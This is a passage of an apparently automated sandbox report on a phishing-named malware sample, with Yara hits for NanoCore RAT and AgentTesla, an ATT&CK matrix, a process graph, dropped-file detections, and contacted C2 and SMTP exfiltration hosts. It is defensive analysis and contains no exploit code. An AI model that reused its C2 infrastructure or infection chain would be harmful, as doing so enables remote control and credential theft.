untimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
                    Source: Icda.exe.1.drString found in binary or memory: NanoCore.ClientPluginHost
                    Yara detected AgentTeslaShow sources
                    Source: Yara matchFile source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.483921714.00000000004E2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.245444705.0000000012EA1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Fdquqwatjjr.exe PID: 7032, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe, type: DROPPED
                    Source: Yara matchFile source: 5.0.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.Fdquqwatjjr.exe.4e0000.0.unpack, type: UNPACKEDPE
                    Yara detected Nanocore RATShow sources
                    Source: Yara matchFile source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
                    Source: Yara matchFile source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05292546 bind,
                    Source: C:\Users\user\AppData\Local\Temp\Icda.exeCode function: 3_2_05292523 bind,

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsWindows Management Instrumentation211Scheduled Task/Job2Access Token Manipulation1Disable or Modify Tools1OS Credential Dumping1Account Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScripting1Boot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1Input Capture11File and Directory Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsScheduled Task/Job2Logon Script (Windows)Scheduled Task/Job2Scripting1Security Account ManagerSystem Information Discovery116SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information121NTDSQuery Registry1Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing24LSA SecretsSecurity Software Discovery321SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol11Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading2Cached Domain CredentialsVirtualization/Sandbox Evasion15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion15DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 326301 Sample: Consignment Document PL&BL ... Startdate: 03/12/2020 Architecture: WINDOWS Score: 100 74 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->74 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 15 other signatures 2->80 10 Consignment Document PL&BL Draft.exe 3 2->10         started        13 VLC2.exe 2->13         started        17 dhcpmon.exe 2->17         started        process3 dnsIp4 64 Consignment Document PL&BL Draft.exe.log, ASCII 10->64 dropped 19 Consignment Document PL&BL Draft.exe 5 10->19         started        68 centurygift.myq-see.com 13->68 92 Antivirus detection for dropped file 13->92 94 Multi AV Scanner detection for dropped file 13->94 96 Machine Learning detection for dropped file 13->96 file5 signatures6 process7 file8 52 C:\Users\user\AppData\...\Rczgwoxvqzh.exe, PE32 19->52 dropped 54 C:\Users\user\AppData\Local\Temp\Icda.exe, PE32 19->54 dropped 22 Rczgwoxvqzh.exe 6 19->22         started        26 Icda.exe 1 10 19->26         started        process9 dnsIp10 56 C:\Users\user\AppData\Local\...\Isgeprf.exe, PE32 22->56 dropped 58 C:\Users\user\AppData\...\Fdquqwatjjr.exe, PE32 22->58 dropped 82 Antivirus detection for dropped file 22->82 84 Multi AV Scanner detection for dropped file 22->84 86 Detected unpacking (overwrites its own PE header) 22->86 29 Fdquqwatjjr.exe 22->29         started        33 Isgeprf.exe 7 22->33         started        66 centurygift.myq-see.com 172.94.25.202, 5500, 5550 M247GB United States 26->66 60 C:\Program Files (x86)\...\dhcpmon.exe, PE32 26->60 dropped 62 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 26->62 dropped 88 Machine Learning detection for dropped file 26->88 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->90 file11 signatures12 process13 dnsIp14 70 flood-protection.org 85.187.154.178, 49739, 587 A2HOSTINGUS United States 29->70 72 mail.flood-protection.org 29->72 98 Antivirus detection for dropped file 29->98 100 Multi AV Scanner detection for dropped file 29->100 102 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 29->102 106 3 other signatures 29->106 50 C:\Users\user\AppData\Local\Temp\VLC2.exe, PE32 33->50 dropped 104 Machine Learning detection for dropped file 33->104 36 cmd.exe 33->36         started        38 cmd.exe 33->38         started        file15 signatures16 process17 process18 40 conhost.exe 36->40         started        42 timeout.exe 36->42         started        44 VLC2.exe 36->44         started        46 conhost.exe 38->46         started        48 schtasks.exe 38->48         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Consignment Document PL&BL Draft.exe21%VirustotalBrowse
                    Consignment Document PL&BL Draft.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\Isgeprf.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\Icda.exe100%AviraTR/Dropper.MSIL.Gen7
                    C:\Users\user\AppData\Local\Temp\VLC2.exe100%AviraTR/Dropper.Gen
                    C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe100%AviraTR/Spy.Gen8
                    C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe100%AviraHEUR/AGEN.1101060
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
                    C:\Users\user\AppData\Local\Temp\Isgeprf.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Icda.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\VLC2.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
                    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe94%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
                    C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe67%ReversingLabsByteCode-MSIL.Infostealer.DarkStealer
                    C:\Users\user\AppData\Local\Temp\Icda.exe94%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
                    C:\Users\user\AppData\Local\Temp\Isgeprf.exe86%ReversingLabsByteCode-MSIL.Infostealer.Fareit
                    C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe76%ReversingLabsByteCode-MSIL.Trojan.Ursnif
                    C:\Users\user\AppData\Local\Temp\VLC2.exe86%ReversingLabsByteCode-MSIL.Infostealer.Fareit

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    17.0.dhcpmon.exe.c80000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    14.0.VLC2.exe.900000.0.unpack100%AviraTR/Dropper.GenDownload File
                    5.0.Fdquqwatjjr.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                    3.2.Icda.exe.a40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    16.0.VLC2.exe.a0000.0.unpack100%AviraTR/Dropper.GenDownload File
                    5.2.Fdquqwatjjr.exe.4e0000.0.unpack100%AviraHEUR/AGEN.1138205Download File
                    3.0.Icda.exe.a40000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    2.2.Rczgwoxvqzh.exe.c00000.0.unpack100%AviraHEUR/AGEN.1101060Download File
                    1.2.Consignment Document PL&BL Draft.exe.400000.0.unpack100%AviraHEUR/AGEN.1101060Download File
                    3.2.Icda.exe.5970000.5.unpack100%AviraTR/NanoCore.fadteDownload File
                    14.2.VLC2.exe.900000.0.unpack100%AviraTR/Dropper.GenDownload File
                    16.2.VLC2.exe.a0000.0.unpack100%AviraTR/Dropper.GenDownload File
                    4.0.Isgeprf.exe.710000.0.unpack100%AviraTR/Dropper.GenDownload File
                    17.2.dhcpmon.exe.c80000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
                    4.2.Isgeprf.exe.710000.0.unpack100%AviraTR/Dropper.GenDownload File
                    2.0.Rczgwoxvqzh.exe.c00000.0.unpack100%AviraHEUR/AGEN.1101060Download File

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://DynDns.comDynDNS0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    https://dh2LZPEqfQO.net0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    https://api.ipify.orgGETMozilla/5.00%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://mail.flood-protection.org0%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://EAXDhR.com0%Avira URL Cloudsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://flood-protection.org0%Avira URL Cloudsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    flood-protection.org
                    85.187.154.178
                    truetrue
                      unknown
                      centurygift.myq-see.com
                      172.94.25.202
                      truefalse
                        high
                        mail.flood-protection.org
                        unknown
                        unknowntrue
                          unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://127.0.0.1:HTTP/1.1Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          low
                          http://www.apache.org/licenses/LICENSE-2.0Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersGConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                high
                                http://DynDns.comDynDNSFdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/?Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.founder.com.cn/cn/bTheConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://dh2LZPEqfQO.netFdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haFdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers?Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comRczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designersRczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.goodfont.co.krConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comlConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://api.ipify.orgGETMozilla/5.0Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.typography.netDConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://mail.flood-protection.orgFdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cnConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                          high
                                          https://api.telegram.org/bot%telegramapi%/Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Fdquqwatjjr.exe.2.drfalse
                                            high
                                            http://www.jiyu-kobo.co.jp/Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/DPleaseConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers8Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                              high
                                              http://EAXDhR.comFdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fonts.comConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.sandoll.co.krConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.urwpp.deDPleaseConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.zhongyicts.com.cnConsignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://flood-protection.orgFdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmpfalse
